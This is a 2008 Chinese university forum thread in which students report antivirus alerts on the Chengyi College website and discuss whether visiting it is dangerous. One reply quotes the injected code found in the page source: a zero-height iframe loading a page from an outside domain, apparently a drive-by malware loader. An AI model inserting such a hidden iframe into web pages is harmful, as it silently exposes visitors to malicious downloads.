诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz

CY主页有木马诶

访问诚毅官网  http://chengyi.jmu.edu.cn/   的时候 金山总是弹出发现   js.agent.oz.2523$ \( G% l3 \* i/ t5 A, _
. p9 V2 M- ~2 ?; _
3 y! {# V0 Q8 J8 y) P3 ]* `: B
---------------------
/ f2 W% R, `3 J& Z根据LZ反应截至 2008-8-16 18:30 诚毅学院首页 内部的新闻 列表.内部的新闻详细连接.和就业在线.均收到感染.代码可能只是为了提高感染者的PV值浏览量等也是有可能. 危害程度未知.但从大家但从大家反应的情况来看应该不是很直接的病毒或者木马.不过大家访问的时候还应当注意. 1 [" G! i0 t) ]7 a+ o" }, X
Ad编辑.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x

评分

Admin + 3 原创文章:温馨提示: 您好 !  很感谢您在 ...

瑞星没提示。
卡吧也有提示···几天就这样啦

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
.............我还以为是小家的...
% p7 O7 p; V6 T2 Z$ k- ?--------------------' n) K- k9 |* z  N( d
网站有漏洞: 被嵌套了代码.
; s2 m0 U# f2 d2 j5 j5 h: U3 f1 r9 }8 i/ w- F
大家可以右键.查看源文件  能看到被嵌入的代码:4 M0 y/ w# ]  X7 M
360 也能提示.% g# }0 e" n% H6 l5 ?# n

" n- W& y# s9 J: z* ]9 j# h
  1. <iframe src=http://www.hehe-7.cn/a0116159/a11.htm width=100 height=0></iframe>
复制代码
刚试了一下~~直接跳出来了~~ps:我还没装杀毒的软件:m10
难道是有高手弄的?
还好我没进,要不然我的电脑肯定又要中毒了。。
:m28
- H) S/ J: N- R4 P" t/ @$ q: b, ]是谁那么缺德。

回复 6楼 熊熊 的帖子

哈哈,熊熊真勇敢
我关了金山进了一次还不是活着出来
不是什么厉害的病毒吧。。。! x) U5 `; y  @; T: [
刚知道时我就去看了看。
4 e, u# w8 O8 V& h0 G0 N4 i2 t8 ^
5 t" G) B6 }$ F7 _5 s我的也是金山。但根本没反应= =b 2 g/ l; h& o$ l5 z
5 e: O- P4 N$ @, n5 K
我的电脑也根本没事发生。。
我家的诺顿也有反映
不装杀毒的 完全没反映 也肯定没中毒
很多新生都被干掉了。